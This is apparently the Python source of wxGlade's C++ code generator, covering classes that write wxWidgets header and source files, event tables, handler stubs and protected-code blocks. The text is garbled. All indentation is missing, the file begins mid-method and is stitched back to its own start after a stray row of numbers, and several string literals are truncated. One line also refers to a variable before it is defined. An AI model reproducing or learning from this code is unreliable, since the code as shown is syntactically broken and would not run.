already_there = prev_src.event_handlers.get(classname, set())
t = self.tabs(1)
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
if classname not in prev_src.event_table_def:
hwrite('\nprotected:\n')
hwrite(self.tabs(1) + 'DECLARE_EVENT_TABLE()\n')
tag = '<%swxGlade event_handlers %s>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
# no attributes tag found, issue a warning and do nothing
self.warning( "wxGlade events block not found for %s, event table code NOT generated" % code_obj.name )
# source file
tab = self.tabs(1)
# set the window's style
style_p = code_obj.properties.get("style")
if style_p and style_p.value_set != style_p.default_value:
style = mycn_f(style_p.get_string_value())
if style:
sign_inst = sign_inst.replace('style', '%s' % style)
# constructor
if is_new:
base = "%s(%s)" % (base, sign_inst)
if custom_base:
bases = [b.strip() for b in custom_base.split(',')]
if bases:
base = "%s(%s)" % (bases[0], sign_inst)
rest = ", ".join([b + "()" for b in bases[1:]])
if rest:
base += ", " + rest
swrite('\n%s::%s(%s):\n%s%s\n{\n' % (fmt_klass, fmt_klass, sign_decl2, tab, base) )
if self._mark_blocks:
swrite(tab + '// begin wxGlade: %s::%s\n' % (fmt_klass, fmt_klass))
# the optional initial code from the code properties
if not self.preview and code_obj.check_prop("extracode_pre"):
for l in code_obj.properties["extracode_pre"].get_lines():
swrite(tab + l)
# set size here to avoid problems with splitter windows
if 'size' in code_obj.properties and code_obj.properties["size"].is_active():
swrite( tab + self.generate_code_size(code_obj) )
for l in builder.get_properties_code(code_obj):
swrite(tab + l)
for l in klass.init:
swrite(tab + l)
if klass.final:
swrite(tab + "\n")
for l in klass.final:
swrite(tab + l)
for l in builder.get_layout_code(code_obj):
swrite(tab + l)
# the optional final code from the code properties
if not self.preview and code_obj.check_prop("extracode_post"):
for l in code_obj.properties["extracode_post"].get_lines():
swrite(tab + l)
# now check if there are extra lines to add to the constructor
for l in builder.get_init_code(code_obj):
swrite(tab + l)
swrite( self.tmpl_ctor_call_layout % {'tab':tab} )
if self._mark_blocks:
# end tag
swrite('%s%s end wxGlade\n' % (tab, self.comment_sign))
# write class function end statement
if self.tmpl_cfunc_end and is_new:
swrite( self.tmpl_cfunc_end % {'tab':tab} )
# replace code inside existing constructor block
if prev_src and not is_new:
# replace the lines inside the ctor wxGlade block
# with the new ones
tag = '<%swxGlade replace %s %s>' % (self.nonce, classname, classname)
if not prev_src.replace( tag, "".join(source_buffer) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::%s block not found, relative code NOT generated" % (fmt_klass, fmt_klass) )
source_buffer = []
swrite = source_buffer.append
# generate code for event table
code_lines = self.generate_code_event_table( code_obj, is_new, tab, prev_src, event_handlers )
if prev_src and not is_new:
tag = '<%swxGlade replace %s event_table>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::event_table block not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
# generate code for event handler stubs
code_lines = self.generate_code_event_handler( code_obj, is_new, tab, prev_src, event_handlers )
# replace code inside existing event handlers
if prev_src and not is_new:
tag = '<%swxGlade add %s event handlers>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s event handlers marker not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
if not self.multiple_files and prev_src:
# if this is a new class, add its code to the new_classes list of the SourceFileContent instance
if is_new:
prev_src.new_classes.append( ("".join(header_buffer), "".join(source_buffer)) )
return
if self.multiple_files:
if base in self.obj_builders:
klass.dependencies.update( getattr(self.obj_builders[base], 'import_modules', []) )
if prev_src:
tag = '<%swxGlade insert new_classes>' % self.nonce
prev_src.replace_header(tag, "")
# insert the module dependencies of this class
# WARNING: there's a double space ' ' between 'replace' and 'dependencies' in the tag below,
# because there is no class name (see SourceFileContent, line ~147)
tag = '<%swxGlade replace dependencies>' % self.nonce
code = self._format_dependencies(klass.dependencies)
prev_src.replace_header(tag, code)
# insert the extra code of this class
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
# if there's extra code but we are not overwriting existing sources, warn the user
if extra_code_h or extra_code_cpp:
self.warning( '%s (or one of its children) has extra code classes, but you are not overwriting '
'existing sources: please check that the resulting code is correct!' % code_obj.name )
extra_code_h = self._tagcontent("::extracode", extra_code_h)
extra_code_cpp = self._tagcontent("::extracode", extra_code_cpp)
tag = '<%swxGlade replace extracode>' % self.nonce
prev_src.replace_header(tag, extra_code_h)
prev_src.replace(tag, extra_code_cpp)
# store the new file contents to disk
name = os.path.join(self.out_dir, classname)
self.save_file( name +"."+ self.header_extension, "".join(prev_src.header_content), content_only=True )
self.save_file( name +"."+ self.source_extension, "".join(prev_src.content), content_only=True )
return
# create the new source file
header_file = os.path.join(self.out_dir, classname + "." + self.header_extension)
source_file = os.path.join(self.out_dir, classname + "." + self.source_extension)
hout = []
sout = []
# header file ----------------------------------------------------------------------------------------------
# isolation directives
hn = os.path.basename(header_file).upper().replace('.', '_')
hout.append('#ifndef %s\n#define %s\n' % (hn, hn))
hout.append('\n')
# write the common lines
hout.extend( self.header_lines )
hout.append('\n')
# write the module dependencies for this class
code = self._format_dependencies(klass.dependencies)
hout.append(code)
hout.append('\n')
# insert the extra code of this class
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_h = self._tagcontent('::extracode', extra_code_h)
hout.append(extra_code_h)
hout.append('\n')
# write the class body
for line in header_buffer:
hout.append(line)
hout.append('\n#endif // %s\n' % hn)
# source file ----------------------------------------------------------------------------------------------
# write the common lines
sout.append(self.header_lines[0])
sout.append('#include "%s"\n\n' % os.path.basename(header_file))
# insert the extra code of this class
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
extra_code_cpp = self._tagcontent('::extracode', extra_code_cpp)
sout.append(extra_code_cpp)
sout.append('\n')
# write the class implementation
sout.extend(source_buffer)
# store source to disk
self.save_file(header_file, hout)
self.save_file(source_file, sout)
else: # not self.multiple_files
# write the class body onto the single source file
self.output_header.extend(header_buffer)
self.output_file.extend(source_buffer)
def add_object(self, klass, parent, parent_builder, obj):
# get the widget builder instance
builder = self._get_object_builder(klass, obj)
if not builder: return None
try:
init, ids, final = builder.get_code(obj)
except:
print(obj)
raise # this shouldn't happen
if not obj.IS_SIZER: # the object is a wxWindow instance
if obj.check_prop_truth("extracode_pre"):
init = obj.properties["extracode_pre"].get_lines() + init
if obj.check_prop_truth("extracode_post"):
init += obj.properties["extracode_post"].get_lines()
if obj.check_prop_truth('extraproperties'): # insert these only after extracode_post
init += self.generate_code_extraproperties(obj)
mycn = getattr(builder, 'cn', self.cn)
for win_id, evt, handler, evt_type in builder.get_event_handlers(obj):
klass.event_handlers.append( (win_id, mycn(evt), handler, evt_type) )
# try to see if there's some extra code to add to this class
extra_code = getattr(builder, 'extracode', getattr(obj, 'extracode', "") or "" )
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^###\s*$', re.M), extra_code, 1)
klass.extra_code_h.append(extra_code[0])
if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
# if we are not overwriting existing source, warn the user about the presence of extra code
if not self.multiple_files and self.previous_source:
self.warning( '%s has extra code, but you are not overwriting existing sources: please check '
'that the resulting code is correct!' % obj.name )
klass.ids.extend(ids)
if self.store_as_attr(obj):
if obj.check_prop("instance_class"):
klassname = obj.instance_class
else:
klassname = obj.get_prop_value("class", obj.WX_CLASS)
klass.sub_objs.append( (klassname, obj.name) )
klass.init.extend(init)
if parent_builder: # add to sizer or notebook
klass.init.extend( parent_builder.get_code_per_child(parent, obj) )
klass.final[:0] = final
if self.multiple_files and obj.IS_CLASS:
klass.dependencies.append(obj.klass)
else:
if obj.WX_CLASS in self.obj_builders:
headers = getattr(self.obj_builders[obj.WX_CLASS], 'import_modules', [])
klass.dependencies.update(headers)
return builder
def generate_code_event_handler(self, code_obj, is_new, tab, prev_src, event_handlers):
"""Generate the event handler stubs
Parameters:
code_obj: Object to generate code for (CodeObject)
is_new: Indicates if previous source code exists (bool)
tab: Indentation of function body (str)
prev_src: Previous source code (SourceFileContent)
event_handlers: List of event handlers
see: tmpl_func_event_stub"""
code_lines = []
swrite = code_lines.append
if not event_handlers:
return []
tmpl_handler = """
void %(klass)s::%(handler)s(%(evt_type)s &event) // wxGlade: %(klass)s.<event_handler>
{
%(tab)sevent.Skip();
%(tab)s// notify the user that he hasn't implemented the event handler yet
%(tab)swxLogDebug(wxT("Event handler (%(klass)s::%(handler)s) not implemented yet"));
}
"""
if prev_src:
already_there = prev_src.event_handlers.get(code_obj.klass, set())
else:
already_there = set()
for win_id, event, handler, evt_type in event_handlers:
if handler not in already_there:
swrite( tmpl_handler % {'evt_type': evt_type, 'handler': handler, 'klass': code_obj.klass, 'tab': tab} )
already_there.add( handler )
if is_new or not prev_src:
swrite('\n\n')
swrite('// wxGlade: add %s event handlers\n' % code_obj.klass)
if is_new or not prev_src:
swrite('\n')
return code_lines
def generate_code_event_table(self, code_obj, is_new, tab, prev_src, event_handlers):
"""Generate code for event table declaration.
code_obj: Object to generate code for (CodeObject)
is_new: Indicates if previous source code exists (bool)
tab: Indentation of function body (str)
prev_src: Previous source code (SourceFileContent)
event_handlers: List of event handlers (strings)"""
code_lines = []
write = code_lines.append
if not event_handlers:
return code_lines
if prev_src and code_obj.klass in prev_src.event_table_decl:
has_event_table = True
else:
has_event_table = False
if is_new or not has_event_table:
write('\nBEGIN_EVENT_TABLE(%s, %s)\n' % (code_obj.klass, code_obj.WX_CLASS))
write(tab + '// begin wxGlade: %s::event_table\n' % code_obj.klass)
for obj, event, handler, evt_type in event_handlers:
if obj is None: continue
if isinstance(obj, str):
win_id = obj
else:
win_id = self.generate_code_id(obj)[1]
if 'EVT_NAVIGATION_KEY' in event:
tmpl = '%(tab)s%(event)s(%(klass)s::%(handler)s)\n'
else:
tmpl = '%(tab)s%(event)s(%(win_id)s, %(klass)s::%(handler)s)\n'
details = { 'tab': tab, 'event': event, 'win_id': win_id, 'klass': code_obj.klass, 'handler': handler }
write(tmpl % details)
write(tab + '// end wxGlade\n')
if is_new or not has_event_table:
write('END_EVENT_TABLE();\n\n')
return code_lines
def generate_code_id(self, obj, id=None):
if id is None:
id = obj.window_id
if not id:
if obj is not None and obj.check_prop_truth("stockitem"):
return '', "wxID_" + obj.stockitem
return '', 'wxID_ANY'
id = str(id)
tokens = id.split('=', 1)
if len(tokens) != 2:
return '', tokens[0] # we assume name is declared elsewhere
name, val = tokens
if not name:
return '', val
name = name.strip()
val = val.strip()
if val == '?':
val = self.generated_ids.get(name)
if val is None:
val = 'wxID_HIGHEST + %d' % self.last_generated_id
self.last_generated_id += 1
self.generated_ids[name] = val
else:
val = val
return '%s = %s' % (name, val), name
def generate_code_size(self, obj):
objname = self.format_generic_access(obj)
if obj.IS_CLASS:
name2 = 'this'
else:
name2 = obj.name
size = obj.properties["size"].get_string_value()
use_dialog_units = (size[-1] == 'd')
method = 'SetMinSize' if obj.parent_window else 'SetSize'
if use_dialog_units:
return '%s%s(wxDLG_UNIT(%s, wxSize(%s)));\n' % (objname, method, name2, size[:-1])
return '%s%s(wxSize(%s));\n' % (objname, method, size)
def quote_path(self, s):
return 'wxT(%s)' % super(CPPCodeWriter, self).quote_path(s)
def _quote_str(self, s):
if self._use_gettext:
return '_("%s")' % s
return 'wxT("%s")' % s
def format_generic_access(self, obj):
if obj.IS_CLASS:
return ''
return '%s->' % obj.name
def _format_dependencies(self, dependencies):
"Format a list of header files for the dependencies output"
dep_list = []
for dependency in sorted(dependencies): # unique and sorted
if dependency and ('"' != dependency[0] != '<'):
dep_list.append('#include "%s.h"\n' % dependency)
else:
dep_list.append('#include %s\n' % dependency)
return self._tagcontent( '::dependencies', dep_list )
writer = CPPCodeWriter() # The code writer is an instance of CPPCodeWriter
language = writer.language # Language generated by this code generator
| 45.243486 | 120 | 0.558901 |
import os.path, re, logging
from codegen import BaseLangCodeWriter, BaseSourceFileContent, _replace_tag
from codegen import ClassLines as BaseClassLines
import config, wcodegen
class SourceFileContent(BaseSourceFileContent):
rec_block_start = re.compile(
r'^(?P<spaces>\s*)'
r'//\s*'
r'begin\s+wxGlade:\s*'
r'(?P<classname>\w*)'
r'::'
r'(?P<block>\w+)'
r'\s*$'
)
rec_block_end = re.compile(
r'^\s*'
r'//\s*'
r'end\s+wxGlade'
r'\s*$'
)
rec_class_end = re.compile(
r'^\s*};\s*'
r'//\s*'
r'wxGlade:\s+end\s+class'
r'\s*$'
)
rec_class_decl = re.compile(
r'^\s*'
r'class\s+([a-zA-Z_]\w*)'
r'\s*'
)
rec_decl_event_table = re.compile(
r'^\s*'
r'DECLARE_EVENT_TABLE\s*\(\s*\)\s*;?'
r'\s*$'
)
rec_def_event_table = re.compile(
r'^\s*'
r'BEGIN_EVENT_TABLE\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)'
r'\s*$'
)
rec_event_handler = re.compile(
r'^\s*'
r'(?:virtual\s+)?'
r'void\s+(?P<handler>[A-Za-z_]+\w*)'
r'\s*'
r'\([A-Za-z_:0-9]+\s*&\s*\w*\)\s*;'
r'\s*'
r'//\s*wxGlade:\s*<event_handler>'
r'\s*$'
)
rec_event_handlers_marker = re.compile(
r'^\s*'
r'//\s*wxGlade:\s*add\s+'
r'((?:\w|:)+)\s+event handlers'
r'\s*$'
)
def __init__(self, name, code_writer):
self.header_content = None
self.content = None
self.event_table_decl = {}
self.event_table_def = {}
self.header_extension = code_writer.header_extension
self.source_extension = code_writer.source_extension
BaseSourceFileContent.__init__(self, name, code_writer)
def replace_header(self, tag, content):
return _replace_tag(self.header_content, tag, content)
def build_untouched_content(self):
BaseSourceFileContent.build_untouched_content(self)
self._build_untouched(self.name + "." + self.header_extension, True)
BaseSourceFileContent.build_untouched_content(self)
self._build_untouched(self.name + "." + self.source_extension, False)
def _build_untouched(self, filename, is_header):
prev_was_handler = False
events_tag_added = False
inside_block = False
inside_comment = False
tmp_in = self._load_file(filename)
out_lines = []
check_old_methods = []
for line in tmp_in:
comment_index = line.find('/*')
if not inside_comment and comment_index != -1 and comment_index > line.find('//'):
inside_comment = True
if inside_comment:
end_index = line.find('*/')
if end_index > comment_index:
inside_comment = False
if not is_header:
result = None
else:
result = self.rec_class_decl.match(line)
if not inside_comment and not inside_block and result:
if not self.class_name:
out_lines.append( '<%swxGlade insert new_classes>' % self.nonce )
self.new_classes_inserted = True
self.class_name = result.group(1)
self.class_name = self.format_classname(self.class_name)
self.classes.add( self.class_name )
out_lines.append(line)
elif not inside_block:
result = self.rec_block_start.match(line)
if not inside_comment and result:
spaces = result.group('spaces')
which_class = result.group('classname')
which_block = result.group('block')
if not which_class:
which_class = self.class_name
else:
which_class = self.format_classname(which_class)
self.spaces[which_class] = spaces
inside_block = True
if which_block in ("do_layout","set_properties"):
check_old_methods.append( len(out_lines) )
out_lines.append( '<%swxGlade replace %s %s>' %
(self.nonce, result.group('classname'), result.group('block') ) )
else:
dont_append = False
if is_header and not inside_comment:
result = self.rec_event_handler.match(line)
if result:
prev_was_handler = True
which_handler = result.group('handler')
which_class = self.class_name
self.event_handlers.setdefault( which_class, set() ).add( which_handler )
else:
if prev_was_handler:
out_lines.append('<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
prev_was_handler = False
events_tag_added = True
elif not events_tag_added and \
self.is_end_of_class(line):
out_lines.append( '<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
result = self.rec_decl_event_table.match(line)
if result:
self.event_table_decl[self.class_name] = True
elif not inside_comment:
result = self.rec_event_handlers_marker.match(line)
if result:
out_lines.append( '<%swxGlade add %s event handlers>' % (self.nonce, result.group(1)) )
dont_append = True
result = self.rec_def_event_table.match(line)
if result:
which_class = result.group(1)
self.event_table_def[which_class] = True
if not dont_append:
out_lines.append(line)
else:
if self.rec_block_end.match(line):
inside_block = False
if is_header and not self.new_classes_inserted:
out_lines.append('<%swxGlade insert new_classes>' % self.nonce)
while check_old_methods:
i = check_old_methods.pop(-1)
if out_lines[i+1].strip()=='}':
self._remove_method(out_lines, i-2, i+1)
if is_header:
self.header_content = out_lines
else:
self.content = out_lines
def is_end_of_class(self, line):
return self.rec_class_end.match(line)
class ClassLines(BaseClassLines):
def __init__(self):
BaseClassLines.__init__(self)
self.ids = []
self.sub_objs = []
self.extra_code_h = []
self.extra_code_cpp = []
self.dependencies = set()
class CPPCodeWriter(BaseLangCodeWriter, wcodegen.CppMixin):
ClassLines = ClassLines
_code_statements = {
'backgroundcolour': "%(objname)sSetBackgroundColour(%(value)s);\n",
'disabled': "%(objname)sEnable(0);\n",
'extraproperties': "%(objname)sSet%(propname_cap)s(%(value)s);\n",
'focused': "%(objname)sSetFocus();\n",
'foregroundcolour': "%(objname)sSetForegroundColour(%(value)s);\n",
'hidden': "%(objname)sHide();\n",
'setfont': "%(objname)sSetFont(wxFont(%(size)s, %(family)s, "
"%(style)s, %(weight)s, %(underlined)s, wxT(%(face)s)));\n",
'tooltip': "%(objname)sSetToolTip(%(tooltip)s);\n",
'wxcolour': "wxColour(%(value)s)",
'wxnullcolour': "wxNullColour",
'wxsystemcolour': "wxSystemSettings::GetColour(%(value)s)",
}
class_separator = '::'
language_note = \
'// Example for compiling a single file project under Linux using g++:\n' \
'// g++ MyApp.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp\n' \
'//\n' \
'// Example for compiling a multi file project under Linux using g++:\n' \
'// g++ main.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp Dialog1.cpp Frame1.cpp\n' \
'//\n'
output_name = None
output_header = None
output_file = None
shebang = '// -*- C++ -*-\n//\n'
tmpl_cfunc_end = '}\n\n'
tmpl_sizeritem = '%s->Add(%s, %s, %s, %s);\n'
tmpl_sizeritem_button = '%s->AddButton(%s)\n'
tmpl_gridbagsizeritem = '%s->Add(%s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_gridbagsizerspacer = '%s->Add(%s, %s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_spacersize = '%s, %s'
tmpl_appfile = """\
%(overwrite)s\
%(header_lines)s\
#include "%(filename_top_win_class)s"
"""
tmpl_init_gettext = """\
#include <wx/intl.h>
#ifndef APP_CATALOG
#define APP_CATALOG "%(textdomain)s" // replace with the appropriate catalog name
#endif
"""
def _get_app_template(self, app, top_win):
if not self.app_name: return None
klass = app.klass
if self._use_gettext:
gettext1 = ["protected:", "%(tab)swxLocale m_locale; // locale we'll be using"]
gettext2 = ['%(tab)sm_locale.Init();',
'
'%(tab)sm_locale.AddCatalogLookupPathPrefix(wxT(APP_LOCALE_DIR));',
'
'%(tab)sm_locale.AddCatalog(wxT(APP_CATALOG));\n']
else:
gettext1 = gettext2 = []
if klass:
klass1 = 'class %(klass)s: public wxApp {'
klass2 = ['IMPLEMENT_APP(%(klass)s)\n',
'bool %(klass)s::OnInit()']
else:
klass1 = 'class MyApp: public wxApp {'
klass2 = ['IMPLEMENT_APP(MyApp)\n',
'bool MyApp::OnInit()',]
ret = ['', klass1,
'public:', '%(tab)sbool OnInit();'
] + gettext1 + ['};\n'] + klass2 + ['{'] + gettext2 + [
'%(tab)swxInitAllImageHandlers();',
'%(tab)s%(top_win_class)s* %(top_win)s = new %(top_win_class)s(NULL, wxID_ANY, wxEmptyString);',
'%(tab)sSetTopWindow(%(top_win)s);',
'%(tab)s%(top_win)s->Show();',
'%(tab)sreturn true;',
'}', '']
return '\n'.join(ret)
tmpl_empty_string = 'wxEmptyString'
def init_lang(self, app=None):
self.last_generated_id = 1000
self.generated_ids = {}
# Extensions and main filename based on Project options when set
if app is not None:
self.source_extension = app.source_extension or config.default_source_extension
self.header_extension = app.header_extension or config.default_header_extension
else:
self.source_extension = config.default_source_extension
self.header_extension = config.default_header_extension
if hasattr(app, "app_filename"): # only for testing
base = os.path.splitext(app.app_filename)[0]
else:
base = os.path.splitext(config.default_cpp_app_name)[0] #
self.app_filename = '%s.%s' % (base, self.source_extension)
self.header_lines = [ '
'
# include i18n / gettext
if self._use_gettext and self._textdomain:
self.header_lines.append( self.tmpl_init_gettext % {'textdomain': self._textdomain} )
# extra lines to generate (see the 'extracode' property of top-level widgets)
self._current_extra_code_h = []
self._current_extra_code_cpp = []
def init_files(self, out_path):
if self.multiple_files:
self.previous_source = None
self.out_dir = out_path
else:
name = os.path.splitext(out_path)[0]
self.output_name = name
if not self._overwrite:
header_exists = self._file_exists(name + "." + self.header_extension)
source_exists = self._file_exists(name + "." + self.source_extension)
if (header_exists and not source_exists) or (source_exists and not header_exists):
ret = _("To keep existing user code, both header and source file must exist.\n"
"(files '%s...'")
return ret%name
if not self._overwrite and header_exists:
# keep all the lines not inside a wxGlade block.
self.previous_source = SourceFileContent(name, self)
else:
# if the file doesn't exist, create it and write the intro
self.previous_source = None
self.output_header = []
self.output_file = []
oh = os.path.basename(name + "." + self.header_extension).upper().replace( '.', '_' )
self.output_header.append('#ifndef %s\n#define %s\n' % (oh, oh))
self.output_header.append('\n')
for line in self.header_lines:
self.output_header.append(line)
self.output_header.append('\n')
self.output_header.append('<%swxGlade replace dependencies>' % self.nonce)
self.output_header.append('\n')
self.output_header.append('<%swxGlade replace extracode>' % self.nonce)
self.output_header.append('\n')
self.output_file.append('#include "%s.%s"\n\n' % (os.path.basename(name), self.header_extension))
self.output_file.append('<%swxGlade replace extracode>\n' % self.nonce)
self.output_file.append('\n')
def output_header_replace(self, tag, content):
_replace_tag(self.output_header, tag, content)
def finalize(self):
if self.previous_source:
tag = '<%swxGlade insert new_classes>' % self.nonce
if self.previous_source.new_classes:
code = "".join([c[0] for c in self.previous_source.new_classes])
else:
code = ""
self.previous_source.replace_header(tag, code)
extra_source = "".join([c[1] for c in self.previous_source.new_classes])
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent( '::extracode', self._current_extra_code_h )
self.previous_source.replace_header(tag, code)
code = self._tagcontent( '::extracode', self._current_extra_code_cpp )
self.previous_source.replace(tag, code)
tags = re.compile( r'(<%swxGlade replace ([a-zA-Z_]*\w*) (\w+)>)' % self.nonce )
for i,line in enumerate(self.previous_source.header_content):
match = tags.match(line)
if not match: continue
tag = match.groups()
if tag[2] == 'dependencies':
#self._logger.debug('writing dependencies')
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
lines = self._format_dependencies( deps )
elif tag[2] == 'methods':
lines = ''
else:
lines = '// content of this block (%s) not found: did you rename this class?\n' % tag[2]
self.previous_source.replace_header(tag[0], lines)
# remove all the remaining <123415wxGlade ...> tags in source file XXX make more efficient
self._content_notfound( self.previous_source )
tag_start = r'<%swxGlade add ' % self.nonce
tag_end = r' event_handlers>'
for i, line in enumerate(self.previous_source.content):
if line.startswith(tag_start) and line.endswith(tag_end):
source_content.content[i] = ""
# write the new file contents to disk
header_content = "".join( self.previous_source.header_content )
self.save_file( self.previous_source.name + "." + self.header_extension, header_content, content_only=True )
if extra_source:
extra_source = '\n\n' + extra_source
source_content = "".join( self.previous_source.content )
self.save_file( self.previous_source.name + "." + self.source_extension, source_content + extra_source,
content_only=True )
elif not self.multiple_files:
oh = os.path.basename(self.output_name).upper() + '_H'
self.output_header.append('\n
# write the list of include files
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
code = self._format_dependencies( deps )
self.output_header_replace( '<%swxGlade replace dependencies>' % self.nonce, code )
# extra code (see the 'extracode' property of top-level widgets)
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent('::extracode', self._current_extra_code_h)
self.output_header_replace( tag, code )
code = self._tagcontent('::extracode', self._current_extra_code_cpp)
self.output_file_replace( tag, code )
self.save_file( self.output_name + "." + self.header_extension, self.output_header, self._app_added )
self.save_file( self.output_name + "." + self.source_extension, self.output_file, self._app_added )
self.output_file = self.output_header = None
def add_app(self, app_attrs, top_win):
# add language specific mappings
self.lang_mapping['filename_top_win_class'] = '%s.%s' % (top_win.klass, self.header_extension)
BaseLangCodeWriter.add_app(self, app_attrs, top_win)
def add_class(self, code_obj):
assert code_obj not in self.classes
try:
builder = self.obj_builders[code_obj.WX_CLASS]
except KeyError:
logging.error('%s', code_obj)
# this is an error, let the exception be raised; the details are logged by the global exception handler
raise
ret = self.classes[code_obj] = self.ClassLines() # ClassLines will collect the code lines incl. children
return ret
def finalize_class(self, code_obj):
# write the collected code for the class and its children
base = code_obj.WX_CLASS
klass = self.classes[code_obj]
classname = code_obj.klass
fmt_klass = self.cn_class(classname)
if self.multiple_files:
# let's see if the file to generate exists, and in this case create a SourceFileContent instance
filename = os.path.join(self.out_dir, classname.replace('::', '_') + "." + self.header_extension)
if self._overwrite or not self._file_exists(filename):
prev_src = None
else:
prev_src = SourceFileContent( os.path.join(self.out_dir, classname), self )
else:
prev_src = self.previous_source
if prev_src and classname in prev_src.classes:
is_new = False
else:
is_new = True
builder = self.obj_builders[base]
mycn = getattr(builder, 'cn', self.cn)
mycn_f = getattr(builder, 'cn_f', self.cn_f)
# collect all event handlers
event_handlers = klass.event_handlers
for win_id, evt, handler, evt_type in builder.get_event_handlers(code_obj):
event_handlers.append((win_id, mycn(evt), handler, evt_type))
# try to see if there's some extra code to add to this class
extra_code = getattr(builder, 'extracode', getattr(code_obj, 'extracode', "") or "")
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^###\s*$', re.M), extra_code, 1)
klass.extra_code_h.append(extra_code[0])
if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
if not is_new:
self.warning( '%s has extra code, but you are not overwriting existing sources:'
' please check that the resulting code is correct!' % code_obj.name )
if not self.multiple_files:
if klass.extra_code_h:
self._current_extra_code_h.append( "".join( klass.extra_code_h[::-1] ) )
if klass.extra_code_cpp:
self._current_extra_code_cpp.append( "".join( klass.extra_code_cpp[::-1] ) )
default_sign = [('wxWindow*', 'parent'), ('wxWindowID', 'id')]
sign = getattr(builder, 'constructor', default_sign)
defaults = []
for t in sign:
if len(t) == 3:
defaults.append(t[2])
else:
defaults.append(None)
tmp_sign = [t[0] + ' ' + t[1] for t in sign]
sign_decl2 = ', '.join(tmp_sign)
for i in range(len(tmp_sign)):
if defaults[i]:
tmp_sign[i] += '=%s' % defaults[i]
sign_decl1 = ', '.join(tmp_sign)
sign_inst = ', '.join([t[1] for t in sign])
custom_base = code_obj.check_prop_nodefault('custom_base') and code_obj.custom_base.strip() or None
header_buffer = []
source_buffer = []
hwrite = header_buffer.append
swrite = source_buffer.append
if is_new:
pass
elif custom_base:
self.warning( '%s has custom base classes, but you are not overwriting existing sources: '
'please check that the resulting code is correct!' % code_obj.name )
if is_new:
if custom_base:
base = ", public ".join([b.strip() for b in custom_base.split(',')])
hwrite('\nclass %s: public %s {\n' % (fmt_klass, base))
hwrite('public:\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n\n')
# constructor prototype
hwrite(self.tabs(1) + '%s(%s);\n' % (fmt_klass, sign_decl1))
hwrite('\nprivate:\n')
# declarations of the attributes
hwrite('\n')
hwrite('protected:\n')
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
hwrite(self.tabs(1) + '// end wxGlade\n')
if event_handlers:
t = self.tabs(1)
hwrite('\n' + t + 'DECLARE_EVENT_TABLE();\n')
hwrite('\npublic:\n')
already_there = set()
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
hwrite('}; // wxGlade: end class\n\n')
elif prev_src:
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
# let's try to see if there are extra ids to add to the enum
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s ids>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
self.warning("wxGlade ids block not found for %s, ids declarations code NOT generated" % code_obj.name)
tag = '<%swxGlade replace %s methods>' % (self.nonce, classname)
prev_src.replace_header(tag, [])
header_buffer = []
hwrite = header_buffer.append
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s attributes>' % (self.nonce, classname)
if not prev_src.replace_header(tag, "".join(header_buffer)):
self.warning( "wxGlade attributes block not found for %s, attributes declarations code NOT generated" %
code_obj.name )
header_buffer = []
hwrite = header_buffer.append
if event_handlers:
already_there = prev_src.event_handlers.get(classname, set())
t = self.tabs(1)
